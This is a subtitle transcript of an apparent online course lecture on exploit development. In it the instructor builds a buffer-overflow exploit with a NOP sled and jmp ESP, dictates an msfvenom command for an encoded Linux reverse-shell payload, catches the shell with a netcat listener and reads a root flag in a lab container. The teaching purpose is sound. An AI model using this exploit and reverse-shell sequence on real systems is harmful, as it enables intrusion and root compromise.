1 00:00:01,260 --> 00:00:01,540 All right.
2 00:00:01,569 --> 00:00:02,420 Are we recording?
3 00:00:02,430 --> 00:00:03,000 Good.
4 00:00:03,360 --> 00:00:03,750 All right.
5 00:00:03,750 --> 00:00:11,260 So welcome back to part four, so we can prove that we actually landed in the buffer of C's.
6 00:00:11,350 --> 00:00:11,720 C's.
7 00:00:12,760 --> 00:00:16,530 Okay, so let's be a little bit clearer about our code.
8 00:00:17,220 --> 00:00:18,650 Let's go back to our host.
9 00:00:18,660 --> 00:00:19,950 I'm running Parrot.
10 00:00:20,100 --> 00:00:22,590 It doesn't really matter what you're running.
11 00:00:22,590 --> 00:00:26,340 It could be Linux, Parrot, stuff like that.
12 00:00:27,390 --> 00:00:29,400 But we're going to generate our shellcode.
13 00:00:29,400 --> 00:00:37,320 And I want to point out that in our previous 2019 class we have the following bad bytes that we
14 00:00:37,320 --> 00:00:38,280 identified.
15 00:00:38,580 --> 00:00:45,840 Once I finish with DEFCON Pro's versus Josep CES Las Vegas, I'm going to throw in the bad byte elimination
16 00:00:45,840 --> 00:00:46,410 section.
17 00:00:46,410 --> 00:00:48,090 I'm just kind of strapped for time.
18 00:00:49,050 --> 00:00:56,760 So our bad bytes that we identified previously were bad bytes:
19 00:00:57,680 --> 00:01:00:630 hex 09,
20 00:01:01,380 --> 00:01:02,280 hex zero,
21 00:01:02,280 --> 00:01:05,430 a, hex
22 00:01:11,240 --> 00:01:12,870 x0a,
23 00:01:14,670 --> 00:01:17,010 hex 0d,
24 00:01:20,290 --> 00:01:27,910 hex 20 and hex 2f and hex 3f.
25 00:01:32,290 --> 00:01:33,040 Let me see.
26 00:01:36,740 --> 00:01:42,980 So let's clean up our exploit code a bit, because we're actually very close to owning this box.
27 00:01:44,510 --> 00:01:46,940 So I want to create a NOP sled.
28 00:01:46,940 --> 00:01:50,320 So nops equals bytes,
29 00:01:50,330 --> 00:01:53,930 no-operation times 16 NOPs, to be safe.
30 00:01:57,450 --> 00:01:59,700 And we're going to make a jmp ESP.
31 00:01:59,730 --> 00:02:05,670 So let's just rename it to jmp ESP, because we know we're going to land in the extended stack pointer.
32 00:02:10,100 --> 00:02:14,840 We're going to remove this variable.
33 00:02:16,100 --> 00:02:19,430 We'll just call it filler, or let's just call this filler.
34 00:02:25,260 --> 00:02:26,520 Call this filler.
35 00:02:27,600 --> 00:02:29,700 Call this jmp ESP.
36 00:02:34,110 --> 00:02:35,850 And what else?
37 00:02:37,260 --> 00:02:40,940 We're going to generate our shellcode right now.
38 00:02:40,950 --> 00:02:47,310 Python, or Metasploit actually, generates shellcode in Python 3 compatible format, so they prepend
39 00:02:47,310 --> 00:02:49,860 the byte specifier to it.
40 00:02:50,430 --> 00:02:54,080 So if we do this: msf...
41 00:02:57,000 --> 00:03:05,640 -p linux/x86/shell_reverse_tcp LHOST equals local
42 00:03:08,770 --> 00:03:17,160 LPORT equals 4444, -f python, which specifies it as Python.
43 00:03:17,160 --> 00:03:18,960 And then we have our bad bytes.
44 00:03:18,960 --> 00:03:22,830 So it's going to be bad bytes, -b
45 00:03:25,770 --> 00:03:28,790 hex, or hex zero, oops,
46 00:03:31,800 --> 00:03:39,480 09 0a 0d
47 00:03:41,370 --> 00:03:42,150 20
48 00:03:44,040 --> 00:03:46,830 2f 3f.
49 00:03:49,600 --> 00:03:54,730 And I want to specify the platform as --platform
50 00:03:56,230 --> 00:04:14,260 x86 for a 32-bit payload, -e for encoder x86/shikata_ga_nai, -v shellcode, which outputs our
51 00:04:14,260 --> 00:04:19,390 Python shellcode in Python-compatible format as a variable called shellcode.
52 00:04:20,180 --> 00:04:21,459 This is going to take a minute.
53 00:04:42,100 --> 00:04:50,650 So notice how now Python generates shellcode in Python 3 compatible format, so you can copy and paste
54 00:04:50,650 --> 00:04:55,900 all of this and then put it inside of your IDE.
55 00:04:59,050 --> 00:05:01,120 And we have two additional variables.
56 00:05:01,300 --> 00:05:10,630 So what we're going to do is we're going to change this to 4000 bytes, minus length overflow,
57 00:05:11,680 --> 00:05:16,840 minus length jmp ESP, minus length
58 00:05:21,680 --> 00:05:22,580 nops,
59 00:05:25,670 --> 00:05:28,340 minus length shellcode.
60 00:05:34,420 --> 00:05:35,500 Let's see.
61 00:05:40,830 --> 00:05:41,250 Yes.
62 00:05:41,250 --> 00:05:42,900 That's going to be our filler.
63 00:05:43,350 --> 00:05:45,750 And now we're going to add our shellcode right here.
64 00:05:45,750 --> 00:05:52,830 So plus shellcode, and hopefully this works, since I'm in a bit of a rush.
65 00:05:54,790 --> 00:05:57,040 So let's copy and explain.
66 00:05:57,160 --> 00:05:59,320 Let's just run the script real quick.
67 00:06:05,100 --> 00:06:05,800 See.
68 00:06:06,720 --> 00:06:11,100 Go back to our container and run exploit.py.
69 00:06:16,410 --> 00:06:16,570 See?
70 00:06:16,650 --> 00:06:17,250 They told us.
71 00:06:24,630 --> 00:06:28,050 So we have our overflow heading to our jmp
72 00:06:28,050 --> 00:06:29,880 extended stack pointer instruction.
73 00:06:29,880 --> 00:06:31,770 Oh, we forgot about the NOPs.
74 00:06:31,770 --> 00:06:32,370 Sorry.
75 00:06:37,480 --> 00:06:37,840 No.
76 00:06:49,880 --> 00:06:51,860 Let's see, we overflowed.
77 00:06:51,860 --> 00:07:01,280 We redirect to the ESP, we add a sled of 16 no-operation commands to our shellcode.
78 00:07:01,550 --> 00:07:11,600 And then we have our filler, and our filler is a bunch of C's that basically subtracts the remainder of
79 00:07:11,600 --> 00:07:12,470 what's left.
80 00:07:14,540 --> 00:07:15,860 So this should work.
81 00:07:16,790 --> 00:07:18,350 So we're going to run it again.
82 00:07:18,350 --> 00:07:20,090 Running at 80.
83 00:07:22,130 --> 00:07:27,440 We're going to open another window: Ctrl-B, up; Ctrl-B, Shift-5.
84 00:07:28,010 --> 00:07:33,380 And then we will run net... netcat, -lp 4444.
85 00:07:35,210 --> 00:07:38,920 This works: python3 exploit.py. Ctrl-
86 00:07:38,930 --> 00:07:39,980 C to exit.
87 00:07:40,250 --> 00:07:41,660 We got our shell.
88 00:07:43,460 --> 00:07:47,030 So type id, whoami.
89 00:07:48,590 --> 00:07:52,880 And we have a flag that I want you to submit as my quiz answer.
90 00:07:53,150 --> 00:07:54,290 I'm root.
91 00:07:55,460 --> 00:07:59,090 So, cat /root/flag.txt.
92 00:07:59,750 --> 00:08:01,210 This is your flag.
93 00:08:01,220 --> 00:08:03,800 This is the only freebie flag I'll ever give you.
94 00:08:05,060 --> 00:08:10,280 We will have a quiz for you to go through once you're done with this exercise.
95 00:08:10,640 --> 00:08:15,740 And at the end of this exercise on the Udemy class, you're expected to put in this flag.
96 00:08:16,520 --> 00:08:19,130 I don't expect you to do it any other way.
97 00:08:19,130 --> 00:08:24,110 But it is true that you can log in and cat the flag, but you're kind of cheating yourself.
98 00:08:24,110 --> 00:08:29,240 I want you to actually go through the entire exploit development process, so go ahead and submit this
99 00:08:29,240 --> 00:08:30,800 flag once I put the question up.